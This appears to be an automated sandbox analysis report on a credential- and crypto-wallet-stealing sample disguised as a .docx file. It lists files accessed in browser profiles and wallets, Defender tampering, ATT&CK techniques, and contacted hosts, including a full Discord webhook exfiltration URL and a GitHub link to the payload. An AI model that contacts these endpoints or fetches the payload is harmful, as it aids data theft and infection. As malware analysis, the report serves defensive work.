                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: Yara matchFile source: Process Memory Space: chost.exe PID: 280, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 00000011.00000002.2375978136.0000016E17EE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.2023955880.0000025C3C156000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000003.2371288192.0000016E17EE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000003.2047634616.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000003.2367455038.0000016E17B2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000003.2048319230.0000016E1725C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.2372251589.0000016E16DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.2023955880.0000025C3C158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000003.2047803547.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: chost.exe PID: 4336, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: chost.exe PID: 280, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI43362\rarreg.key, type: DROPPED
                    Source: Yara matchFile source: Process Memory Space: chost.exe PID: 280, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting
                    Valid Accounts241
                    Windows Management Instrumentation
                    1
                    Scripting
                    1
                    DLL Side-Loading
                    1
                    File and Directory Permissions Modification
                    1
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    Data Encrypted for Impact
                    CredentialsDomainsDefault Accounts2
                    Native API
                    1
                    DLL Side-Loading
                    11
                    Process Injection
                    4
                    Disable or Modify Tools
                    LSASS Memory3
                    File and Directory Discovery
                    Remote Desktop Protocol3
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts122
                    Command and Scripting Interpreter
                    2
                    Registry Run Keys / Startup Folder
                    2
                    Registry Run Keys / Startup Folder
                    11
                    Deobfuscate/Decode Files or Information
                    Security Account Manager59
                    System Information Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    3
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts4
                    PowerShell
                    Login HookLogin Hook121
                    Obfuscated Files or Information
                    NTDS361
                    Security Software Discovery
                    Distributed Component Object Model1
                    Clipboard Data
                    14
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
                    Software Packing
                    LSA Secrets2
                    Process Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Timestomp
                    Cached Domain Credentials161
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading
                    DCSync1
                    Application Window Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                    Masquerading
                    Proc Filesystem1
                    Remote System Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Modify Registry
                    /etc/passwd and /etc/shadow1
                    System Network Configuration Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron161
                    Virtualization/Sandbox Evasion
                    Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
                    Process Injection
                    Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569492 Sample: Cooperative Agreement000080... Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 90 ip-api.com 2->90 92 objects.githubusercontent.com 2->92 94 3 other IPs or domains 2->94 106 Sigma detected: Capture Wi-Fi password 2->106 108 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->108 110 Multi AV Scanner detection for submitted file 2->110 112 17 other signatures 2->112 13 Cooperative Agreement0000800380.docx.exe 8 2->13         started        15 svchost.exe 1 1 2->15         started        18 Calculator.exe 2 2->18         started        signatures3 process4 dnsIp5 20 cmd.exe 2 13->20         started        104 127.0.0.1 unknown unknown 15->104 process6 signatures7 128 Suspicious powershell command line found 20->128 130 Uses cmd line tools excessively to alter registry or file data 20->130 132 Encrypted powershell cmdline option found 20->132 134 6 other signatures 20->134 23 chost.exe 61 20->23         started        27 powershell.exe 14 16 20->27         started        30 powershell.exe 17 20->30         started        32 2 other processes 20->32 process8 dnsIp9 78 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 23->78 dropped 80 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 23->80 dropped 82 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 23->82 dropped 86 55 other files (none is malicious) 23->86 dropped 136 Multi AV Scanner detection for dropped file 23->136 138 Modifies Windows Defender protection settings 23->138 140 Adds a directory exclusion to Windows Defender 23->140 144 3 other signatures 23->144 34 chost.exe 89 23->34         started        100 github.com 20.233.83.145, 443, 49730, 49732 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 27->100 102 objects.githubusercontent.com 185.199.109.133, 443, 49731, 49733 FASTLYUS Netherlands 27->102 142 Powershell drops PE file 27->142 38 conhost.exe 27->38         started        84 C:\Users\user\AppData\Local\Temp\chost.exe, PE32+ 30->84 dropped 40 dllhost.exe 30->40         started        file10 signatures11 process12 dnsIp13 96 ip-api.com 208.95.112.1, 49746, 49760, 80 TUT-ASUS United States 34->96 98 discord.com 162.159.138.232, 443, 49766 CLOUDFLARENETUS United States 34->98 114 Found many strings related to Crypto-Wallets (likely being stolen) 34->114 116 Tries to harvest and steal browser information (history, passwords, etc) 34->116 118 Modifies Windows Defender protection settings 34->118 120 6 other signatures 34->120 42 cmd.exe 34->42         started        45 cmd.exe 34->45         started        47 cmd.exe 34->47         started        49 29 other processes 34->49 signatures14 process15 signatures16 146 Modifies Windows Defender protection settings 42->146 148 Removes signatures from Windows Defender 42->148 51 powershell.exe 42->51         started        66 2 other processes 42->66 150 Adds a directory exclusion to Windows Defender 45->150 54 powershell.exe 45->54         started        56 conhost.exe 45->56         started        58 powershell.exe 47->58         started        60 conhost.exe 47->60         started        152 Suspicious powershell command line found 49->152 154 Uses cmd line tools excessively to alter registry or file data 49->154 156 Encrypted powershell cmdline option found 49->156 158 Tries to harvest and steal WLAN passwords 49->158 62 getmac.exe 49->62         started        64 systeminfo.exe 49->64         started        68 56 other processes 49->68 process17 file18 122 Loading BitLocker PowerShell Module 51->122 124 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 62->124 126 Writes or reads registry keys via WMI 62->126 76 C:\Users\user\AppData\...\4z11l1tq.cmdline, Unicode 68->76 dropped 71 csc.exe 68->71         started        signatures19 process20 file21 88 C:\Users\user\AppData\Local\...\4z11l1tq.dll, PE32 71->88 dropped 74 cvtres.exe 71->74         started        process22

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Cooperative Agreement0000800380.docx.exe29%ReversingLabsByteCode-MSIL.Trojan.Generic
                    Cooperative Agreement0000800380.docx.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\_MEI43362\VCRUNTIME140.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\_bz2.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\_ctypes.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\_decimal.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\_hashlib.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\_lzma.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\_queue.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\_socket.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\_sqlite3.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\_ssl.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\libcrypto-3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\libffi-8.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\libssl-3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\python312.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exe0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\select.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\sqlite3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\ucrtbase.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI43362\unicodedata.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\chost.exe53%ReversingLabsWin64.Trojan.Generic
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    discord.com
                    162.159.138.232
                    truefalse
                      high
                      github.com
                      20.233.83.145
                      truefalse
                        high
                        ip-api.com
                        208.95.112.1
                        truetrue
                          objects.githubusercontent.com
                          185.199.109.133
                          truefalse
                            blank-7uov3.in
                            unknown
                            unknownfalse
                              NameMaliciousAntivirus DetectionReputation
                              https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMGfalse
                                https://github.com/newpro008/poh21/releases/download/hu23/chost.exe/true
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabchost.exe, 00000011.00000003.2369122552.0000016E179C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    https://github.com/Blank-c/BlankOBFchost.exe, 00000011.00000003.2045074168.0000016E180BD000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2045543203.0000016E172E6000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2045412697.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2045671881.0000016E172EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      https://www.avito.ru/chost.exe, 00000011.00000002.2376400796.0000016E1833C000.00000004.00001000.00020000.00000000.sdmpfalse
                                        https://duckduckgo.com/ac/?q=chost.exe, 00000011.00000003.2369122552.0000016E179C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngp_chost.exe, 00000011.00000002.2372423656.0000016E16FB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                            https://api.telegram.org/botchost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                              http://crl.microsoftpowershell.exe, 0000004F.00000002.2286588093.0000014E184B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                https://www.ctrip.com/chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 0000000C.00000003.1975407820.00000266524A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.1975407820.00000266524F4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.1975407820.0000026652507000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.1975407820.00000266524E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#chost.exe, 00000011.00000002.2371899484.0000016E15457000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy?chost.exe, 00000011.00000002.2376400796.0000016E1833C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        https://www.leboncoin.fr/chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          https://tools.ietf.org/html/rfc2388#section-4.4chost.exe, 00000011.00000002.2372629701.0000016E1725C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2063239108.0000016E1725C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2370358863.0000016E1725C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64chost.exe, 00000011.00000002.2372251589.0000016E16D70000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2032110974.0000016E1723F000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2032110974.0000016E1725F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              https://g.live.com/odclientsettings/Prod.C:svchost.exe, 0000000C.00000003.1975407820.000002665251A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.1975407820.000002665240E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                https://weibo.com/chost.exe, 00000011.00000002.2376962492.0000016E18984000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E189A4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  https://api.anonfiles.com/uploadchost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPschost.exe, 00000011.00000002.2376220344.0000016E181D0000.00000004.00001000.00020000.00000000.sdmpfalse
